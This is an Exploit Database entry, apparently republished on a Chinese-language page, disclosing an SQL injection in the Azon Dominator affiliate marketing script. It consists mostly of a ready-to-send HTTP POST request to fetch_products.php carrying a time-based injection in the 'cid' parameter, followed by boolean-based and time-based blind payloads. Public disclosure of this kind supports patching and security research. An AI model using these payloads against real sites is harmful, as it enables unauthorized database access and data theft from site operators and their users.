Azon Dominator Affiliate Marketing Script – SQL Injection

• Exploit Database
• 23 阅读

• 作者： Buğra Enis Dönmez
  日期： 2024-07-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52059/

•  # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
  # Date: 2024-06-03
  # Exploit Author: Buğra Enis Dönmez
  # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
  # Demo Site: https://azon-dominator.webister.net/
  # Tested on: Arch Linux
  # CVE: N/A
  
  ### Request ###
  
  POST /fetch_products.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  x-requested-with: XMLHttpRequest
  Referer: https://localhost/
  Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
  Content-Length: 79
  Accept-Encoding: gzip,deflate,br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: localhost
  Connection: Keep-alive
  
  cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
  
  ###
  
  ### Parameter & Payloads ###
  
  Parameter: cid (POST)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: cid=1) AND 7735=7735 AND (5267=5267
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442
  
  ###